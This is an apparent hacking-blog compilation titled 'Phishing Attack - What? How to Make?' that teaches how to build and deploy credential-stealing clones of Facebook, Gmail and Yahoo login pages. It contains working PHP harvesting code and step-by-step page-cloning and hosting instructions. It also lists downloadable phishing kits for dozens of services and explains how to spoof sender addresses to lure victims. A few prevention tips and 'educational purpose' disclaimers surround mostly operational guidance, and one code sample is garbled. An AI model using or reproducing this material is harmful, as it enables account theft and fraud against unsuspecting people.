Phishing Attack - What? How to Make ? How It Works?

Phishing ?
========
Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, 
by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker 
pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, 
and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like 
your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to 
the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web 
pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example 
of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take,
 will help you defend against such an attack.


How To Make A Phishing Page Of Any Website ?
=====================================

Now  A Days The Major Companies Like Facebook, Google , Yahoo, Pinterest, etc.

All are in the competition but everyday 1000 of Account's are hack.

Steps Of Create Phish Page:

1. Go to the site which u want to make a phish page...




2. I will choose the "FACEBOOK"

3. After the site is open you can click ur mouse right click and choose the "view page source" option.





4. Copy the all code to notepad..



Now the actual hacking is begin..

5. After complete the copy u need to find login_form like this...

    In there u need to change the link to ur .php file.

    This is action of login and sending the data to server we can change it  with simple 
   
    "mail.php"  .  So all the data gone to our server where we hosted our phish files.

   

6.  Php script For any phishing page.

###########
##   Code:  ##
###########

<?php
header ('Location: https://www.facebook.com/pages/create/ ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;

?>

Copy this code and save in  "mail.php"  format.


7. Create a simple blank txt file and give them name " log.txt " .



And Done. Your phishing site is ready.




How to Use This Phishing Pages For Hacking Purpose ?
===========================================

1.    The first need to do Phishing Attack U need a Free Hosting sites. I provide u Many as 
        
       Follow :

       
Hosting Website That I Recommend:   http://000webhost.com/
      
Other Hosting Websites That You May Like:

* 110mb -                              http://110mb.com
* Ripway -                             http://ripway.com
* SuperFreeHost -               http://superfreehost.info
* Freehostia -                       http://freehostia.com
* Funpic -                              http://funpic.de 
* Funpic -                              http://funpic.org 
* Freeweb7 -                        http://freeweb7.com
* t35 -                                    http://t35.com
* Awardspace -                    http://awardspace.com
* PHPNet -                            http://phpnet.us
* Free Web Hosting Pro -   http://freewebhostingpro.com
* ProHosts -                          http://prohosts.org
* AtSpace -                           http://atspace.com
* 000webhost -                    http://000webhost.com/
* My5GB -                            http://www.my5gb.com/
* Oxyhost -                           http://www.oxyhost.com/
* Rack111 -                         http://www.rack111.com/
* Ocostwebhost -                http://0costwebhost.com/
* FreeZoka -                        http://www.freezoka.com/






2. After completed the Register u have a user name and pass to login.





3. Upload the phishing files to the server.





4. Now Test That it's working or not.

5. Open Your Domain which will you see in ur hosting site panel.



6. U see the phish page which u had uploaded open it...




7. After the page Loded u can put Your ID & PASSWORD ( i wrote this detail to the phish page)





    When u click on the login button it's sends the logs to our server.

8. Check this Log file & edit it & You see the logins with password.




Hope You Guys Enjoyed The Phishing Attack,,

If You Like It So plz... Comment....

NOTE :  This is Only For Educational Purpose.

DOWNLOAD PHISH PAGE

How to Hack using Phishing & 34 phishing scripts

Hello friends..
Next very interesting article is about "PHISHING" .This is the one of the easiest method to hack anyone,without knowing the basics of Hacking and Programming...


What Phishing is ?

Suppose you check your email one day and find a message from your bank. You've gotten e-mail from them before, but this one seems suspicious, especially since it threatens to close your account if you don't reply immediately. What do you do? This message and others like it are examples of phishing, a method of online identity theft. In addition to stealing personal and financial data, phishers can infect computers with viruses and convince people to participate unwittingly in money laundering.

Most people associate phishing with e-mail messages that spoof, or mimic,bank or Credit card companies or other business like Amazon or Ebay. These messages look authentic and attempt to get victims to reveal their personal information. But e-mail messages are only one small piece of a phishing scam.

What to Plan Before Phishing ?

1. Planning. Phishers decide which business to target and determine how to get e-mail addresses for the customers of that business. They often use the same mass-mailing and address collection techniques as spammers.
2. Setup. Once they know which business to spoof and who their victims are, phishers create methods for delivering the message and collecting the data. Most often, this involves e-mail addresses and a Web page.
3. Attack. This is the step people are most familiar with -- the phisher sends a phony message that appears to be from a reputable source.
4. Collection. Phishers record the information victims enter into Web pages or popup windows.
5. Identity Theft and Fraud. The phishers use the information they've gathered to make illegal purchases or otherwise commit fraud. As many as a fourth of the victims never fully recover If the phisher wants to coordinate another attack, he evaluates the successes and failures of the completed scam and begins the cycle again.

Phishing scams take advantages of software and security weaknesses on both the client and server sides. But even the most high-tech phishing scams work like old-fashioned con jobs, in which a hustler convinces his mark that he is reliable and trustworthy. Next, we'll look at the steps phishers take to convince victims that their messages are legitimate.

Phishing Scams

Since most people won't reveal their bank account, credit card number or password to just anyone, phishers have to take extra steps to trick their victims into giving up this information. This kind of deceptive attempt to get information is called social engineering. Phishers often use real company logos and copy legitimate e-mail messages, replacing the links with ones that direct the victim to a fraudulent page. They use spoofed, or fake, e-mail addresses in the "From:" and "Reply-to" fields of the message, and they obfuscate links to make them look legitimate. But recreating the appearance of an official message is just part of the process.

Phishing Prevention

Tip 1 : It is important that you learn to recognize all types of phishing emails. You should make yourself aware that if you receive a message which needs you to take immediate action with regard to any of your personal accounts then avoid it like the plague. Most phishing emails will be addressed to either “Dear Valued Customer” or “Dear Sir/Madam”, while any legitimate emails from your bank or credit card company will be addressed to you by name. It is important to know that the phisher who has sent the email in the first place is after your personal information in order to use it for fraudulent purposes.

Tip 2 : Never ever send any kind of sensitive personal information using an email. Emails are not the most secure form of communication available for people to use on the Internet. Certainly many scammers are quite capable of producing an email that looks legitimate and so will be easily able to forge such a document and then gain your information in this way.

Tip 3 : If you do have to transmit any personal information over the Internet then ensure that the site you are providing it to is completely secure. The best way for a person to identify if a site is secure or not is by looking at the site address. All sites which are considered to be secure should start with “https://” and not “http://”. Also if you look in the browser status bar you will see the lock icon being displayed.

Tip 4 :If you ever receive an email from someone you do not know and it contains a link within it then do not click on it. Rather what you should be doing is opening up an new browser page and then typing in the address which you know to be the authentic one. Or else you could call the person or company directly if you have had dealings with them and have spoken with them by telephone before.

How to do phishing ?

ICA members,Now i am going to explain that how to do PHISHING...Steps are indicated as follows :-

Step 1 - Firstly you must signup for a free web hosting service like:
www.freehostia.com
www.byethost.com etc….. and register a domain or subdomain.
After getting your signup done, you have your own subdomain like for instance you registered with freehostia, then your domain is like “www.yourname.freehostia.com”

Step 2- Now Login to your freehostia account and go to “File Manager” in the freehostia control panel.

Step 3- Now what you have to do is, go to your domain folder like “yourname.freehostia.com” and create a separate folder in that directory with the name of the site, for eg. yahoo , if you want to phish a yahoomail account!

Step 4- Download The scripts From below links the compressed file and extract it to your desktop:

and then open your desired phishing file. You’ll find 3 files there viz. “Index.html” & “login.php” & "passwords.txt" [ name may vary but similar in some samples ]. Here the Index.html file is Page looks similar to Phishing sites like.. facebook,gmail. and Login.php file is used to process the data and password.txt is to save all hacked password.

AOL.com - AIM
d2jsp
DailyMotion.com
eBay.com
EverQuest Forum
FaceBook.com
FileFront.com
Gmail.com
Gmail.de
Habbo.de
Habbohotel.com
ICQ.com
Itunes
Megaupload.com
MMOCheats

Myspace

Nexon.net
OGame.de
Oxedion
Packstation
PayPal.com
PhotoBucket.com
Plesk
RapidShare.com
RapidShare.de
Rip/wa/y.com
siteworld.de
Skype.com
Steam phishing Site
Strato
Usenext
VanGuard
Yahoo.com
YouTube.com

DOWNLOAD ALL

Step 5- Now upload all 3 files to www folder inside “yourname.freehostia.com” .
So when you’re done with the uploading part, the link to your yahoo phisher is “www.yourname.freehostia.com/index.htm”.

Step 6- Congrats !! That is your phisher page !! Now all you have to do is copy the link to the phisher file i.e.”www.yourname.freehostia.com/index.htm” and send it to the victim you want to hack ! When he/she’ll open that link, it’ll be directed to your yahoo phisher and when he/she logins that page he/she’ll be redirected to the original website and you’ll get the password in the “password.txt” file which will be created in the same folder you created in your freehostia domain and the path to that file will be “www.yourname.freehostia.com/password.txt” !

How to make Victim to Login on your Phishing Page ?

There is a simple ,but effective Method to make the victim fool,So that he/she will Login on your Phishing page without using there mind.... :-)

I am going to show a example of HI5.COM

1.) Go to your inbox and find a simple hi5 Friend Request.Copy it like in the picture:



2) Go to http://www.sendanonymousemail.net/ or http://www.anonymailer.net/ and send the email to Victim Like shown below...



3.)Now select the "Accept Friend" line.
*Click the hyperlink button.
*Paste your phishing link there.
*Click OK button.
See the pic for more:


4.) Now fill in the fields like this :

To: victimemail@dumb.com
From: info@hi5.com
Subject: Someone has sent you a hi5 Friend Request
Then enter the security code and click send.The e-mail will look like it came from hi5 just that it will redirect the victim to your phishing link instead of hi5.com
The same can be done for facebook and many more websites of your choice.
NOTE:There is a chance that the email wont be sent sometimes.So the best it would be to send it on your own inbox just before you send it to your victim.

IMPORTANT NOTE: CHANGE YOUR FREEHOSTIA DIRECTORY PERMISSION TO “755” SO THAT NO ONE CAN ACCESS YOUR PERSONAL FILES EXCEPT THE PHISHER LOGIN PAGE!!

Phishing ?

Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.

1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.

2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit + S
which does this automatically. Choose where you would like to save the web page and hit Save.


3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.

$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
exit;
?> // Marks the end of the PHP program.


5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.

6. Hit + F , or go to Edit -> Find , type in action and hit “Find Next”.

7. This will highlight the first occurrence of the word “action” in the script and you should see the following:
There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:
Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.

8. Save and close the file.

9. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.

10. Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “yourwebhostname chmod”.

11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.

12. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following:

As you can see if you fell for this the hacker would have your email and password. Scary, eh?

Avhackers_Phisher_maker_3.1

DOWNLOAD